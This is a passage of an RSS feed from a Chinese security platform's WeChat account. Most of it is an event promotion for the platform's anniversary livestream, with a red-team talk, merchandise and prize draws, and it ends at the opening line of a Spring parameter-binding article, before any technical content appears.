<section data-role="outer" label="Powered by 135editor.com" data-mpa-powered-by="yiban.io"><section data-role="paragraph" style="height: 0px;overflow: hidden;"><br/></section><section data-id="95299" data-tools="135编辑器"><section style="box-sizing:border-box;max-width: 100% !important;width: 100%;"><section><section style="background: #23296b;"><section style="background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNxic3ZCOOVbtXaFkGpsuAOXU38ma9hOibd5fr0o05W7TvaeemVsZVqUVg/640&#34;)repeat-y;background-size:100%;"><section><section style="padding: 2em;background: transparent none repeat scroll 0% 0%;height: 4px;overflow: hidden;"><br/></section></section><section><section style="box-sizing:border-box;max-width: 80% !important;width: 80%;margin: 0px auto;"><img class="rich_pages wxw-img" data-ratio="0.39166666666666666" title="排版头图.png" data-w="1080" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" src="https://wechat2rss.xlab.app/img-proxy/?k=5004d61d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaPf4ciaxNEia3ibdXBBGk8BERZD6ibE862ESVya37Vw9ordsE6MjnibEAtxA%2F640"/></section></section><section><section data-autoskip="1" style="padding: 1em 0px;font-size: 14px;text-align: center;letter-spacing: 1.5px;line-height: 1.75em;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="vertical-align:inherit;line-height: 1.75em;"><br/></p><p style="vertical-align:inherit;line-height: 1.75em;"><br/></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">SecIN即将2岁啦！</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">感谢师傅们一路以来的温暖陪伴～<br/></span></p><p style="vertical-align:inherit;line-height: 1.75em;"><br/></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">为了回馈师傅们对SecIN的支持与喜爱</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">2周年我们准备了</span><span style="color: #ffff00;"><strong><span style="font-size: 14px;">多重福利</span></strong></span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">不仅有SecTime红队大佬现场教学</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">还有SecYoung潮酷周边穿搭讲解</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">更有超多礼物等你来拿!<br/>以上惊喜尽在</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="color: #ffff00;"><strong><span style="font-size: 14px;">4月20日“云众可信”视频号直播间</span></strong></span></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="font-size: 14px;">希望师傅们“保持热爱，探索不停”</span></p></section></section><section><section style="box-sizing:border-box;padding: 2em 0px;width:2em;margin: 0px auto;">       <img class="rich_pages wxw-img" data-ratio="1.4666666666666666" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-w="30" src="https://wechat2rss.xlab.app/img-proxy/?k=2d9dd58c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaLa8aPATKJVBtlWF54XZRhbJibjB03QhiaPMY6NjH6JQp2G1h0XTGKYeg%2F640"/></section></section><section><section data-autoskip="1" style="padding: 1em 0px;font-size: 14px;text-align: center;letter-spacing: 1.5px;line-height: 1.75em;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="vertical-align:inherit;">  下面小IN给大家介绍下本次直播的“看点”！</p></section></section><section><section style="text-align: center;padding: 2em 0px;box-sizing: border-box;"><section style="display: inline-block;"><section style="display:flex;justify-content: center;"><section style="box-sizing:border-box;width:40px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width:40px;"><img data-w="78" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-ratio="1.205128205128205" src="https://wechat2rss.xlab.app/img-proxy/?k=dc0104c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNibZKL7LKBHV5dtVK08nEJricjgRsOkicxA5hA97XwCjdzzZHkZ6ljHTtA%2F640"/></section></section><section style="margin-left:-36px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:top;"><section data-brushtype="text" style="padding:20px 1.5em 20px 3em;color:#fff;font-size:16px;letter-spacing:1.5px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:bottom;"><span style="font-size: 14px;"><strong>看点一</strong></span><strong><span style="font-size: 16px;"><br/></span></strong></section></section></section></section></section></section><section data-role="paragraph"><p style="vertical-align:inherit;"><br/></p></section><section><section style="padding: 0px 1em;box-sizing: border-box;"><section style="display:flex;justify-content: center;align-items: center;"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing:border-box;width:8em;"><section style="box-sizing:border-box;width:8em;text-align:center;color: #fff;letter-spacing: 1.5px;"><span style="font-size: 14px;"><strong>SecTime红队盛筵</strong></span></section></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section></section><section style="margin-top: -12px;border-color: currentcolor rgb(255, 255, 255) rgb(255, 255, 255);border-style: none solid solid;border-width: medium 1px 1px;border-radius: 2px;padding: 1.8em 1em 1em;box-sizing: border-box;"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;height: 0px;overflow: hidden;"><br/></section><section data-autoskip="1" style="font-size: 14px;text-align:justify;letter-spacing: 1.5px;line-height: 1.75em;color:#fff;"><p style="vertical-align: inherit;line-height: 1.75em;"><span style="font-size: 14px;color: #ffffff;">本次我们邀请了启明星辰猎豹安全实验室为大家分享红队技术，相信大佬独特的思路，会给大家带来不一样的火花。另外还有神秘嘉宾带来议题分享，请大家拭目以待！</span></p></section></section></section></section><section style="padding: 2em;background: transparent;"><section><section style="text-align: center;padding: 2em 0px;box-sizing: border-box;"><section style="display: inline-block;"><section style="display:flex;justify-content: center;"><section style="box-sizing:border-box;width:40px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width:40px;"><img data-w="78" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-ratio="1.205128205128205" src="https://wechat2rss.xlab.app/img-proxy/?k=dc0104c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNibZKL7LKBHV5dtVK08nEJricjgRsOkicxA5hA97XwCjdzzZHkZ6ljHTtA%2F640"/></section></section><section style="margin-left:-36px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:top;"><section data-brushtype="text" style="padding:20px 1.5em 20px 3em;color:#fff;font-size:16px;letter-spacing:1.5px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:bottom;"><span style="font-size: 14px;"><strong>看点二</strong></span></section></section></section></section></section></section></section><section><section style="padding: 0px 1em;box-sizing: border-box;"><section style="display:flex;justify-content: center;align-items: center;"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing:border-box;width:8em;"><section style="box-sizing:border-box;width:8em;text-align:center;color: #fff;letter-spacing: 1.5px;"><span style="font-size: 14px;"><strong>潮酷周边官宣</strong></span></section></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section></section><section style="margin-top: -12px;border-color: currentcolor rgb(255, 255, 255) rgb(255, 255, 255);border-style: none solid solid;border-width: medium 1px 1px;border-radius: 2px;padding: 1.8em 1em 1em;box-sizing: border-box;"><section style="box-sizing:border-box;max-width: 100% !important;width: 100%;"><p style="vertical-align:inherit;line-height: 1.75em;"><span style="color: #ffffff;font-size: 14px;">SecIN潮酷周边线上首发，线条圆环字母卫衣，炫彩时尚运动鞋，黑白款低奢潮袜等周边好物，尽显年轻人的「SecYoung」。</span></p><p style="vertical-align:inherit;line-height: 1.75em;"><br/></p><p style="vertical-align:inherit;line-height: 1.75em;"><span style="color: #ffffff;font-size: 14px;">直播当天，会有运营小姐姐进行全方位穿搭讲解，让你即刻变身为安全圈时尚icon。当然了，活动现场我们还会随机抽取幸运观众，赠送「SecYoung」潮酷周边套装哦～</span></p></section></section></section></section><section data-role="paragraph"><p style="vertical-align:inherit;"><br/></p></section><section><section style="text-align: center;padding: 2em 0px;box-sizing: border-box;"><section style="display: inline-block;"><section style="display:flex;justify-content: center;"><section style="box-sizing:border-box;width:40px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width:40px;"><img data-w="78" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-ratio="1.205128205128205" src="https://wechat2rss.xlab.app/img-proxy/?k=dc0104c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNibZKL7LKBHV5dtVK08nEJricjgRsOkicxA5hA97XwCjdzzZHkZ6ljHTtA%2F640"/></section></section><section style="margin-left:-36px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:top;"><section data-brushtype="text" style="padding:20px 1.5em 20px 3em;color:#fff;font-size:16px;letter-spacing:1.5px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:bottom;"><span style="font-size: 14px;"><strong>看点三</strong></span></section></section></section></section></section></section><section data-role="paragraph"><p style="vertical-align:inherit;"><br/></p></section><section data-role="paragraph"><section data-id="undefined"><section style="padding: 0px 1em;box-sizing: border-box;"><section style="display:flex;justify-content: center;align-items: center;"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing:border-box;width:8em;"><section style="box-sizing:border-box;width:8em;text-align:center;color: #fff;letter-spacing: 1.5px;"><strong><span style="font-size: 14px;">精彩好礼送不停</span></strong></section></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section></section><section style="margin-top: -12px;border-color: currentcolor rgb(255, 255, 255) rgb(255, 255, 255);border-style: none solid solid;border-width: medium 1px 1px;border-radius: 2px;padding: 1.8em 1em 1em;box-sizing: border-box;"><section style="box-sizing:border-box;max-width: 100% !important;width: 100%;"><p style="vertical-align:inherit;"><span style="color: #ffffff;font-size: 14px;">进入直播间，就有超多好礼让你带回家。除了盲盒、书籍、鼠标垫之外，更有超惊喜大奖，等你来拿哦～</span></p><p style="vertical-align:inherit;"><span style="color: #ffffff;font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="0.5203703703703704" style="vertical-align:inherit;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=97264037&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaic6KPCeh9GGjvcRGAauEBsICt7zobplMGeibLXoicfuEkG3pMhEcC3LEQ%2F640"/></span></p><p style="vertical-align:inherit;color: #ffffff;font-size: 14px;"><br/></p></section></section></section></section><p style="vertical-align:inherit;"><br/></p></section><section><section data-autoskip="1" style="font-size: 16px;text-align: center;letter-spacing: 1.5px;line-height: 1.75em;color:#fff;padding: 1em 0px;box-sizing: border-box;" data-i="15607332186671"><section data-id="undefined"><section style="text-align: center;padding-top: 2em;box-sizing: border-box;"><section style="display: inline-block;text-align: right;"><section style="box-sizing:border-box;display:inline-block;width:40px;margin-right: -25px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width:40px;"><img class="rich_pages wxw-img" data-ratio="0.925" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-w="40" src="https://wechat2rss.xlab.app/img-proxy/?k=9afdcf6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaeOTJ2tHst2kP3UnmTfWdUVTicnWiaJsOX09b2icOxyXUslRw5w1FFu8Lg%2F640"/></section></section><section style="margin-top: -10px;border-color: rgb(247, 31, 255);border-style: solid;border-width: 3px;box-shadow: rgb(247, 31, 255) 0px 0px 5px;border-radius: 5px;box-sizing: border-box;"><section data-brushtype="text" style="padding: 8px 1em;color: rgb(255, 255, 255);font-size: 16px;letter-spacing: 1.5px;border-color: rgb(254, 254, 254);border-style: solid;border-width: 2px;box-sizing: border-box;">直播观看方式</section></section></section></section><section style="box-sizing:border-box;width:7em;margin: 0px auto;display: flex;justify-content: space-between;"><section style="box-sizing: border-box;width: 2px;height: 2em;background: rgb(254, 254, 254) none repeat scroll 0% 0%;border-color: currentcolor rgb(66, 188, 220);border-style: none solid;border-width: medium 2px;box-shadow: rgb(23, 165, 201) 0px 0px 5px;border-radius: 6px;overflow: hidden;"><br/></section><section style="box-sizing: border-box;width: 2px;height: 2em;background: rgb(254, 254, 254) none repeat scroll 0% 0%;border-color: currentcolor rgb(66, 188, 220);border-style: none solid;border-width: medium 2px;box-shadow: rgb(23, 165, 201) 0px 0px 5px;border-radius: 6px;overflow: hidden;"><br/></section></section><section style="padding:0px 0.8em;display: flex;justify-content: space-between;margin-top: -10px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width: 120px;"><img data-w="180" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-ratio="1.05" src="https://wechat2rss.xlab.app/img-proxy/?k=5f57e7bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUatWXZsrb4d5b0C2kUlicwbuQdoxibCxGQib5H7GTvSR7ibVEbCBlI8G59Hg%2F640"/></section><section style="box-sizing:border-box;width: 120px;"><img class="rich_pages wxw-img" data-ratio="1.05" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-w="180" src="https://wechat2rss.xlab.app/img-proxy/?k=8825340a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNtvjG92BicshOgyJcyqIWibBSZoJ4ZnRzfJiaFibfSmbEY7CmWcicgWdTKBw%2F640"/></section></section><section style="padding: 0px 2em;margin-top: -7.1em;box-sizing: border-box;"><section style="border-color: rgb(249, 121, 254);border-style: solid;border-width: 2px;box-shadow: rgb(247, 31, 255) 0px 0px 10px;border-radius: 6px;box-sizing: border-box;"><section style="border-color: rgb(247, 31, 255);border-style: solid;border-width: 2px;border-radius: 2px;box-sizing: border-box;"><section style="border-color: rgb(254, 254, 254);border-style: solid;border-width: 2px;box-sizing: border-box;"><section data-brushtype="text" style="padding-top: 2em;font-size: 22px;color: rgb(255, 255, 255);letter-spacing: 1.5px;text-align: center;box-sizing: border-box;"><span style="font-size: 14px;">活动时间</span></section><section data-brushtype="text" style="padding-top: 10px;font-size: 18px;color: rgb(255, 255, 255);letter-spacing: 1.5px;text-align: center;box-sizing: border-box;"><p style="vertical-align:inherit;"><span style="font-size: 14px;">4月20日 19:00<br/></span></p></section><section data-brushtype="text" style="padding-top: 2em;font-size: 22px;color: rgb(255, 255, 255);letter-spacing: 1.5px;text-align: center;box-sizing: border-box;"><span style="font-size: 14px;">活动地址</span></section><p style="vertical-align:inherit;"><span style="font-size: 14px;">云众可信视频号直播间</span></p><p style="vertical-align:inherit;"><br/></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: 1.75em;"><span style="font-size: 14px;"><strong><span style="color: #ffff00;">方式一：</span></strong></span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: 1.75em;"><span style="font-size: 12px;">  <span style="font-size: 14px;">扫描下方二维码或微信视频号搜索“云众可信”， 关注视频号，4月20日19:00进入直播间即可观看</span></span><span style="font-size: 14px;"><br/></span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: 1.75em;"><span style="font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="1.007308160779537" width="127" data-w="821" data-width="127px" style="box-sizing: border-box;vertical-align: inherit;width: 110px;height: 111px;" src="https://wechat2rss.xlab.app/img-proxy/?k=fd541526&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaib2aFPToObJWb756J1qZW7JWjx9wdSDUa3bgRmibWk3jicT0IElXK9dxg%2F640"/></span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: 1.75em;"><strong><span style="color: #ffff00;font-size: 14px;">方式二:</span></strong></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: 1.75em;"><span style="font-size: 12px;">  <span style="font-size: 14px;">扫描下方二维码，加入SecIN两周年趣玩派对活动群，即可在第一时间收到直播推送。除此之外，<strong><span style="color: #ffff00;">进群顺序尾号为2的用户可获得惊喜红包一个</span></strong></span></span></p><p style="text-align:center;vertical-align:inherit;margin-top: 1.75em;line-height: 1.75em;"><span style="font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="1" width="122" data-w="396" data-width="122px" style="box-sizing: border-box;vertical-align: inherit;width: 107px;height: 107px;" src="https://wechat2rss.xlab.app/img-proxy/?k=63ce3bff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUapaAnr2O5hSFZOhB0UwicjG1CvdOthU9SckqCt5hl8VoTRp4iaQbJ5e2Q%2F640"/></span></p><p style="text-align:left;vertical-align:inherit;margin-top: 1.75em;line-height: 1.75em;"><br/></p><p style="vertical-align:inherit;"><br/></p><section style="padding:1em 1em 0px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;height: 0px;overflow: hidden;"><br/></section></section><section style="box-sizing:border-box;max-width: 100% !important;width: 100%;margin-top: -6em;"><br/></section></section></section></section></section></section><p style="vertical-align:inherit;"><br/></p><section><section style="text-align: center;padding: 2em 0px;box-sizing: border-box;"><section style="display: inline-block;"><section style="display:flex;justify-content: center;"><section style="box-sizing:border-box;width:40px;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-ms-transform: rotate(0deg);-o-transform: rotate(0deg);"><section style="box-sizing:border-box;width:40px;"><img data-w="78" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" data-ratio="1.205128205128205" src="https://wechat2rss.xlab.app/img-proxy/?k=dc0104c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqrtpu8KpLFk1IzqTzSFicKNibZKL7LKBHV5dtVK08nEJricjgRsOkicxA5hA97XwCjdzzZHkZ6ljHTtA%2F640"/></section></section><section style="margin-left:-36px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:top;"><section data-brushtype="text" style="padding:20px 1.5em 20px 3em;color:#fff;font-size:16px;letter-spacing:1.5px;background:url(&#34;https://mmbiz.qpic.cn/mmbiz_png/xkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUazWFrpwcMTtY2AHDcicratay6MoKFq0ez8LO3MV6hGfXJhf96taq6hBw/640&#34;)no-repeat;background-size:100%;background-position:bottom;"><span style="font-size: 14px;"><strong>特别感谢<br/></strong></span></section></section></section></section></section></section><p style="vertical-align:inherit;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="809" data-ratio="1.4005053695514844" style="max-width: 100% !important;box-sizing: border-box;vertical-align: inherit;width: 578px;height: 809px;" data-type="png" data-w="1583" src="https://wechat2rss.xlab.app/img-proxy/?k=d976fe7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaZ4TGgU9dCmZvlcs8jGibTLIZw7zNsqeJ1Orjq8xoh8Ujic2LTLDoHXMA%2F640%3Fwx_fmt%3Dpng"/></p><p style="vertical-align:inherit;"><span style="font-size: 12px;">(以上排名不分先后，均按首字母排序)</span></p><p style="vertical-align:inherit;"><br/></p><section data-id="undefined"><section style="padding: 0px 1em;box-sizing: border-box;"><section style="display:flex;justify-content: center;align-items: center;"><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing:border-box;width:8em;"><section style="box-sizing:border-box;width:8em;text-align:center;color: #fff;letter-spacing: 1.5px;"><strong><span style="font-size: 14px;">文末福利</span></strong></section></section><section style="box-sizing:border-box;width: 5px;"><section style="box-sizing: border-box;width: 5px;height: 22px;background-image: -webkit-linear-gradient(rgb(249, 169, 252), rgb(200, 252, 235));overflow: hidden;"><br/></section></section><section style="box-sizing: border-box;max-width: 100% !important;width: 100%;border-bottom: 1px solid rgb(255, 255, 255);height: 1px;overflow: hidden;"><br/></section></section><section style="margin-top: -12px;border-color: currentcolor rgb(255, 255, 255) rgb(255, 255, 255);border-style: none solid solid;border-width: medium 1px 1px;border-radius: 2px;padding: 1.8em 1em 1em;box-sizing: border-box;"><section style="box-sizing:border-box;max-width: 100% !important;width: 100%;"><img class="rich_pages wxw-img" data-ratio="1.2203703703703703" title="预热抽奖.png" data-w="1080" style="max-width: 100% !important;box-sizing:border-box;vertical-align:inherit;width: 100%;display: block;" src="https://wechat2rss.xlab.app/img-proxy/?k=30fc9739&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUaFIicpEklPJZwRib037r3TEZ5JOPMUAxbCpUKC1fvdzTTOrVKgXwaVgyw%2F640"/></section><section data-autoskip="1" style="font-size: 14px;text-align:justify;letter-spacing: 1.5px;line-height: 1.75em;color:#fff;"><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">关注SecIN技术平台+转发本文到朋友圈</span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">即可参与抽奖</span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">分组无效哦，开奖前删除无效</span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">开奖后请添加运营小姐姐微信</span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">(小IN:SecIN2020)</span></p><p style="text-align:center;vertical-align: inherit;margin-top: 1.75em;line-height: normal;"><span style="color: #ffffff;font-size: 14px;">审核后我们会在第一时间邮寄奖品</span></p><p style="vertical-align:inherit;"><br/></p></section></section></section></section><p style="vertical-align:inherit;"><br/></p><p style="vertical-align:inherit;"><span data-brushtype="text" style="clear:both;border-width: 0px;border-style: initial;border-color: initial;background-image: -webkit-linear-gradient(top,#f7abfc, #c8fceb);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;-webkit-background-clip: text;-webkit-text-fill-color: transparent;word-break: normal !important;"><strong>END</strong></span></p><p style="vertical-align:inherit;"><br/></p></section></section></section></section></section></section></section></section>



<p><a href="2247485666">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a09da098&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485666%26idx%3D1%26sn%3D6dc6ff835100089e22afdbb05a1bccd2%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 15 Apr 2022 11:27:00 +0800</pubDate>
    </item>
    <item>
      <title>Spring 参数绑定的分析以及甲方自查</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485661&amp;idx=1&amp;sn=0c9683ecbd60effdde67bc8d724f04da</link>
      <description>春天</description>
      <content:encoded><![CDATA[<p>
原创 <span>zy</span> <span>2022-03-31 16:37</span> <span style="display: inline-block;"></span>
</p>

<p>春天</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=1e93891c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdF3so8iad5x05FMpD59slrdLHKWCT9rPCcNdgnyyn8fsKr0zAq3dKiburFWEf5huX8Z73nxjicAqhtow%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;" data-mpa-powered-by="yiban.io"><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>简介</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">环境，找个spring参数绑定的博客就行，这里给个环境例子<a href="https://github.com/wycm/SpringMVC-Demo.git。" target="_blank">https://github.com/wycm/SpringMVC-Demo.git。</a></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">具体参考<span style="color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New 